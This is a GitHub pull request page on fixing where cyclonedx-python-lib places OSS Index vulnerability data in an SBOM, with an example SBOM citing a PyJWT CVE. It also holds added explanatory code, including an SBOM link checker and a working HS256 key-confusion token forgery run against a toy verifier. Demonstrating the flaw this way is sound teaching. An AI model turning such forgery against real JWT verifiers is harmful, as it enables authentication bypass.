fix: corrected data placement for Vulnerabilities returned from OSS Index when generating an SBOM #94
Merged
Conversation
…ndex when generating an SBOM Signed-off-by: Paul Horton <[email protected]>
Example SBOM (1.4, JSON) with the changes:
{
"$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json",
"bomFormat": "CycloneDX",
"specVersion": "1.4",
"serialNumber": "urn:uuid:ee4a7637-7ebf-4c60-b4db-eb63b9bd19b5",
"version": 1,
"metadata": {
"timestamp": "2022-01-27T08:56:24.359212+00:00",
"tools": [
{
"vendor": "CycloneDX",
"name": "cyclonedx-python-lib",
"version": "1.3.0",
"externalReferences": [
{
"type": "build-system",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/actions"
},
{
"type": "distribution",
"url": "https://pypi.org/project/cyclonedx-python-lib/"
},
{
"type": "documentation",
"url": "https://cyclonedx.github.io/cyclonedx-python-lib/"
},
{
"type": "issue-tracker",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/issues"
},
{
"type": "license",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE"
},
{
"type": "release-notes",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md"
},
{
"type": "vcs",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib"
},
{
"type": "website",
"url": "https://cyclonedx.org"
}
]
}
]
},
"components": [
{
"type": "library",
"bom-ref": "ffccc54d-3d7d-4e85-8b05-95bd162cf646",
"author": "Kenneth Reitz",
"name": "certifi",
"version": "2021.10.8",
"licenses": [
{
"expression": "MPL-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "f3d183fd-8bba-4648-a3ed-077b650bdff4",
"author": "Python Packaging Authority",
"name": "setuptools",
"version": "59.6.0",
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "f882d243-2a3d-4326-a21f-42888b4aa04c",
"name": "types-setuptools",
"version": "57.4.7",
"licenses": [
{
"expression": "Apache-2.0 license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "3d2cbe11-75d2-403a-ac11-3e7c1f0ac8cb",
"author": "Hynek Schlawack",
"name": "attrs",
"version": "21.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c57da1eb-d01e-4bd2-96cf-45fbb2ce31ec",
"author": "The pip developers",
"name": "pip",
"version": "21.3.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "ac67fa1d-775b-4bb6-888f-d3c0e05c572d",
"author": "Donald Stufft and individual contributors",
"name": "packaging",
"version": "21.3",
"licenses": [
{
"expression": "BSD-2-Clause or Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8ea61715-9854-4d8d-89a8-2ced85f1f933",
"author": "Bernat Gabor",
"name": "virtualenv",
"version": "20.13.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "856e453e-1414-4f54-bfff-e6ddd0063b20",
"author": "Will McGugan",
"name": "rich",
"version": "11.0.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8c2da1c2-b5df-4b55-af57-bac5c7f89a67",
"author": "Holger Krekel, Bruno Oliveira, Ronny Pfannschmidt, Floris Bruynooghe, Brianna Laugher, Florian Bruhin and others",
"name": "pytest",
"version": "6.2.5",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "e543c7e6-d5e0-459c-ac79-c289a975a677",
"author": "Ned Batchelder and 146 others",
"name": "coverage",
"version": "6.2",
"licenses": [
{
"expression": "Apache 2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "7d1da738-be12-4bd4-9970-303382bbc9b9",
"author": "Markus Siemens",
"name": "tinydb",
"version": "4.6.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "0d728da6-33dd-4324-b80e-55e01a4793ff",
"author": "Tarek Ziade",
"name": "flake8",
"version": "4.0.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "148fa5dd-79a0-4cae-9865-8ae2f98c52b4",
"author": "Holger Krekel, Oliver Bestwalter, Bern\u00e1t G\u00e1bor and others",
"name": "tox",
"version": "3.24.5",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c57fe768-a2d9-438c-b1e4-fec171192d7c",
"author": "Benedikt Schmitt",
"name": "filelock",
"version": "3.4.1",
"licenses": [
{
"expression": "Unlicense"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "13d5e7cb-887b-4d34-803f-f70100be18d7",
"author": "Kim Davies",
"name": "idna",
"version": "3.3",
"licenses": [
{
"expression": "BSD-3-Clause"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "1a209cc9-0caf-4fdc-a0d8-e7c66766c2f0",
"author": "Paul McGuire",
"name": "pyparsing",
"version": "3.0.7",
"licenses": [
{
"expression": "MIT License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8277fa4f-30ef-4d0d-b1d9-1a2e009701cd",
"author": "Kenneth Reitz",
"name": "requests",
"version": "2.27.1",
"licenses": [
{
"expression": "Apache 2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "1e7943de-53d6-4627-a6c4-e421a7d10206",
"author": "Georg Brandl",
"name": "Pygments",
"version": "2.11.2",
"licenses": [
{
"expression": "BSD License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "e0531b38-c0b5-439d-8d4e-c95cc2a0cfa3",
"author": "Johann C. Rocholl",
"name": "pycodestyle",
"version": "2.8.0",
"licenses": [
{
"expression": "Expat license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "abd70860-96f0-40a5-b25f-d992ce55a250",
"author": "A lot of people",
"name": "pyflakes",
"version": "2.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "81409b25-1213-4ea1-a802-807e1a6676a4",
"name": "platformdirs",
"version": "2.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "46a2ca5e-55d7-4b37-aeb5-8afc2bcf622e",
"author": "Ahmed TAHRI @Ousret",
"name": "charset-normalizer",
"version": "2.0.10",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "92eab689-5abb-4e08-b71d-f8eb2d0ac2b5",
"author": "Steven Springett",
"name": "cyclonedx-bom",
"version": "2.0.1",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "9888c71c-39d9-4ee7-a319-58bcadeb47da",
"author": "Andrey Petrov",
"name": "urllib3",
"version": "1.26.8",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "db7cc511-a0b4-445f-85ca-fd8d394b5cfc",
"author": "Benjamin Peterson",
"name": "six",
"version": "1.16.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "a887ae3d-7e2c-4be0-9574-7f23a7bba9b6",
"author": "holger krekel, Ronny Pfannschmidt, Benjamin Peterson and others",
"name": "py",
"version": "1.11.0",
"licenses": [
{
"expression": "MIT license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "5c5da76d-8cae-4f2b-83b6-36448b248e12",
"author": "Paul Horton",
"name": "cyclonedx-python-lib",
"version": "1.3.0",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
"author": "Jos\u00e9 Padilla",
"name": "PyJWT",
"version": "1.3.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "decf14ef-0978-468f-96b8-88f50506b68d",
"author": "Ronny Pfannschmidt, Holger Krekel",
"name": "iniconfig",
"version": "1.1.1",
"licenses": [
{
"expression": "MIT License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "6d54b14b-6829-43f8-bde1-67b64ebd3993",
"author": "Holger Krekel",
"name": "pluggy",
"version": "1.0.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "76586a8e-5329-46b8-b552-c6307bdd4719",
"author": "Daniel Holth",
"name": "wheel",
"version": "0.37.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "84b57982-f8b3-4b7d-b170-a98a5e1d0db0",
"name": "types-toml",
"version": "0.10.3",
"licenses": [
{
"expression": "Apache-2.0 license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "0fa1011e-6548-41d8-a97b-f453432dbcec",
"author": "William Pearson",
"name": "toml",
"version": "0.10.2",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c2fd0e00-3a42-4cb7-82b2-77d02c215df5",
"author": "the purl authors",
"name": "packageurl-python",
"version": "0.9.6",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "a24ba1e7-68aa-4727-b335-929d246f58df",
"author": "Bibek Kafle <[email protected]>, Roland Shoemaker <[email protected]>",
"name": "commonmark",
"version": "0.9.1",
"licenses": [
{
"expression": "BSD-3-Clause"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "4f418679-331f-418b-8a8b-e6b0a49c43c8",
"author": "Peter Waller (Thanks to Christopher Jones and Stefano Rivera)",
"name": "pyfiglet",
"version": "0.8.post1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "cded65f9-94fe-4a69-9e50-a51d29dc0305",
"author": "Ian Cordasco",
"name": "mccabe",
"version": "0.6.1",
"licenses": [
{
"expression": "Expat license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "9ecc003c-5346-4785-9b1d-81ebd29c00fa",
"author": "Donal Mee",
"name": "polling2",
"version": "0.5.0",
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "df04cfb6-bbc1-4465-a1b8-13182941700e",
"author": "Jonathan Hartley",
"name": "colorama",
"version": "0.4.4",
"licenses": [
{
"expression": "BSD"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "dfd61713-a56d-40d5-a064-97d1a3c9d3ad",
"author": "Vinay Sajip",
"name": "distlib",
"version": "0.3.4",
"licenses": [
{
"expression": "Python license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "3c20d0b7-ac28-49a5-b000-d6113b13f508",
"author": "Paul Horton",
"name": "ossindex-lib",
"version": "0.2.1",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
}
],
"vulnerabilities": [
{
"bom-ref": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
"id": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
},
"references": [
{
"id": "CVE-2017-11424",
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
}
}
],
"ratings": [
{
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
},
"score": 7.5,
"severity": "high",
"method": "CVSSv3",
"vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
"description": "[CVE-2017-11424] Improper Access Control",
"detail": "In PyJWT 1.5.0 and below the `invalid_strings` check in `HMACAlgorithm.prepare_key` does not account for all PEM encoded public keys. Specifically, the PKCS1 PEM encoded format would be allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC KEY-----` which is not accounted for. This enables symmetric/asymmetric key confusion attacks against users using the PKCS1 PEM encoded public keys, which would allow an attacker to craft JWTs from scratch.",
"advisories": [
{
"url": "https://github.com/jpadilla/pyjwt/pull/277"
},
{
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11424"
}
],
"affects": [
{
"ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
"versions": [
{
"version": "1.3.0",
"status": "affected"
}
]
}
]
}
]
}
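In the SBOM above, the OSS Index finding is tied to a component only through `vulnerabilities[].affects[].ref`, which has to equal the `bom-ref` of the PyJWT component, and the affected version has to be the version the SBOM actually lists. The following consumer-side check is an added example written for this page; it is not code from this PR or from cyclonedx-python-lib or ossindex-lib. It embeds a constructed, cut-down document with the same shape as the one in the PR description (two components, one vulnerability) plus a deliberately broken copy whose `affects.ref` points at no component, and it flags dangling refs, version mismatches, and CVSS v3 severities that disagree with their score.

```python
import copy
import json
from typing import Dict, List

# Constructed sample modelled on the structure of the SBOM in the PR
# description, cut down to two components and one vulnerability. It is not the
# project's own output; it is embedded so the check runs offline.
SAMPLE_BOM: Dict = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "version": 1,
    "components": [
        {"type": "library", "bom-ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
         "name": "PyJWT", "version": "1.3.0", "purl": "pkg:pypi/pyjwt@1.3.0"},
        {"type": "library", "bom-ref": "13d5e7cb-887b-4d34-803f-f70100be18d7",
         "name": "idna", "version": "3.3", "purl": "pkg:pypi/idna@3.3"},
    ],
    "vulnerabilities": [{
        "bom-ref": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
        "id": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
        "source": {"name": "OSS Index"},
        "references": [{"id": "CVE-2017-11424", "source": {"name": "OSS Index"}}],
        "ratings": [{"source": {"name": "OSS Index"}, "score": 7.5,
                     "severity": "high", "method": "CVSSv3",
                     "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],
        "affects": [{"ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
                     "versions": [{"version": "1.3.0", "status": "affected"}]}],
    }],
}

# Same document with the vulnerability pointing at a bom-ref no component
# carries: the kind of misplacement a consumer must catch rather than trust.
BROKEN_BOM: Dict = copy.deepcopy(SAMPLE_BOM)
BROKEN_BOM["vulnerabilities"][0]["affects"][0]["ref"] = "00000000-0000-0000-0000-000000000000"

# CVSS v3.x qualitative severity bands from the FIRST specification.
CVSS3_BANDS = ((0.0, 0.0, "none"), (0.1, 3.9, "low"), (4.0, 6.9, "medium"),
               (7.0, 8.9, "high"), (9.0, 10.0, "critical"))


def cvss3_severity(score: float) -> str:
    """Map a CVSS v3 base score to its qualitative severity label."""
    for low, high, label in CVSS3_BANDS:
        if low <= score <= high:
            return label
    raise ValueError(f"CVSS v3 score out of range: {score}")


def load_bom(path: str) -> Dict:
    """Read a CycloneDX JSON document from disk."""
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def check_vulnerability_placement(bom: Dict) -> List[str]:
    """Return a list of problems; empty means every vulnerability is attached to a
    real component at the listed version and its CVSSv3 rating is self-consistent."""
    components = {c["bom-ref"]: c for c in bom.get("components", []) if "bom-ref" in c}
    problems: List[str] = []
    for vuln in bom.get("vulnerabilities", []):
        vid = vuln.get("id", "<no id>")
        affects = vuln.get("affects", [])
        if not affects:
            problems.append(f"{vid}: has no 'affects' entry, so it is attached to no component")
        for target in affects:
            ref = target.get("ref")
            comp = components.get(ref)
            if comp is None:
                problems.append(f"{vid}: affects.ref {ref!r} matches no component bom-ref")
                continue
            for entry in target.get("versions", []):
                if entry.get("status") == "affected" and entry.get("version") != comp.get("version"):
                    problems.append(f"{vid}: marks {comp['name']} {entry.get('version')} affected "
                                    f"but the SBOM lists {comp.get('version')}")
        for rating in vuln.get("ratings", []):
            if rating.get("method") == "CVSSv3" and "score" in rating and "severity" in rating:
                expected = cvss3_severity(float(rating["score"]))
                if rating["severity"] != expected:
                    problems.append(f"{vid}: severity {rating['severity']!r} disagrees with "
                                    f"score {rating['score']} (expected {expected!r})")
    return problems


def affected_components(bom: Dict) -> Dict[str, List[str]]:
    """Map each vulnerability id to 'name version' of the components it affects,
    resolved through bom-ref. Unresolvable refs are skipped here; the checker
    above is what reports them."""
    components = {c["bom-ref"]: c for c in bom.get("components", []) if "bom-ref" in c}
    out: Dict[str, List[str]] = {}
    for vuln in bom.get("vulnerabilities", []):
        hits = []
        for target in vuln.get("affects", []):
            comp = components.get(target.get("ref"))
            if comp is not None:
                hits.append(f"{comp['name']} {comp.get('version', '?')}")
        out[vuln.get("id", "<no id>")] = hits
    return out


if __name__ == "__main__":
    import sys
    docs = [("sample", SAMPLE_BOM), ("broken", BROKEN_BOM)]
    if len(sys.argv) > 1:
        docs.append((sys.argv[1], load_bom(sys.argv[1])))
    for name, doc in docs:
        print(name, check_vulnerability_placement(doc) or "OK", affected_components(doc))
```

Run it with the path of a generated `bom.json` as the first argument to check a real document after the two embedded ones. `affected_components` is the view a triage workflow actually wants (which package at which version is hit), and it only works if the `bom-ref` link the PR corrects is intact, which is why the checker reports a dangling ref as an error rather than silently dropping the finding.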
damiencarol
approved these changes
Jan 28, 2022
Tested it on a real project. LGTM
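The `detail` text of the vulnerability in the SBOM above describes why the missing `-----BEGIN RSA PUBLIC KEY-----` prefix matters: if a server hands its RSA public key to a verifier that still accepts HS256, an attacker can sign an HS256 token using that public key as the HMAC secret, and the only thing stopping it is the key guard recognising PEM public keys. The following is an added example written for this page, not code from PyJWT or from this PR; the pre-fix prefix list is reconstructed from the advisory's description and is an assumption about the original code, and the PEM strings are constructed headers with filler bodies, not real keys. It shows the forgery succeeding against the incomplete guard for a PKCS#1 key and failing against the hardened one.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Optional


class InvalidKeyError(ValueError):
    """Raised when a key that looks like a public key is offered as an HMAC secret."""


# Prefixes the HMAC key guard rejects. The pre-fix list is reconstructed from
# the advisory text (SPKI "PUBLIC KEY", certificates and OpenSSH keys, but not
# PKCS#1 "RSA PUBLIC KEY"); it is an assumption, not a copy of PyJWT's code.
VULNERABLE_INVALID_PREFIXES = (
    b"-----BEGIN PUBLIC KEY-----",
    b"-----BEGIN CERTIFICATE-----",
    b"ssh-rsa",
)
# Hardened list: the PKCS#1 header is recognised as well.
HARDENED_INVALID_PREFIXES = VULNERABLE_INVALID_PREFIXES + (b"-----BEGIN RSA PUBLIC KEY-----",)


def make_prepare_hmac_key(invalid_prefixes) -> Callable[[bytes], bytes]:
    """Build a prepare_key-style guard for HMAC algorithms from a prefix list."""
    def prepare_key(key: bytes) -> bytes:
        if any(key.startswith(p) for p in invalid_prefixes):
            raise InvalidKeyError("an asymmetric public key must not be used as an HMAC secret")
        return key
    return prepare_key


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(payload: dict, secret: bytes) -> str:
    """Minimal HS256 JWT signer with no library, enough to show the forgery."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    tag = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(tag)}"


def hs256_verify(token: str, key: bytes, prepare_key: Callable[[bytes], bytes]) -> Optional[dict]:
    """Verify an HS256 token the way a server does when it passes its RSA public
    key to a verifier that still accepts HS256. Returns the payload on success,
    None on a bad signature, and raises InvalidKeyError if the guard rejects the key."""
    secret = prepare_key(key)
    header, body, sig = token.split(".")
    expected = hmac.new(secret, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(body))


# Constructed PEM-shaped strings: only the headers matter to the guard; the
# bodies are filler rather than real key material.
PKCS1_PUBLIC_PEM = b"-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAfiller==\n-----END RSA PUBLIC KEY-----\n"
SPKI_PUBLIC_PEM = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqfiller==\n-----END PUBLIC KEY-----\n"


def forgery_accepted(public_pem: bytes, invalid_prefixes) -> bool:
    """Attacker signs HS256 with the server's *public* key as the HMAC secret;
    return True if a verifier guarded by invalid_prefixes accepts the token."""
    forged = hs256_sign({"sub": "admin", "role": "superuser"}, public_pem)
    try:
        return hs256_verify(forged, public_pem, make_prepare_hmac_key(invalid_prefixes)) is not None
    except InvalidKeyError:
        return False


if __name__ == "__main__":
    for label, prefixes in (("vulnerable", VULNERABLE_INVALID_PREFIXES),
                            ("hardened", HARDENED_INVALID_PREFIXES)):
        print(label, "PKCS#1 forgery accepted:", forgery_accepted(PKCS1_PUBLIC_PEM, prefixes),
              "SPKI forgery accepted:", forgery_accepted(SPKI_PUBLIC_PEM, prefixes))
```

The prefix guard is defence in depth. The attack only works at all when the verifier will run HS256 against a key intended for RS256, so the primary fix on the consuming side is to pin the accepted algorithm list to the asymmetric algorithm and never let the token's `alg` header choose it; the guard then catches the case where that pinning was forgotten.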
Signed-off-by: Paul Horton [email protected]
This PR:
It relates to the following issue #s:
cc @bhamail / @DarthHater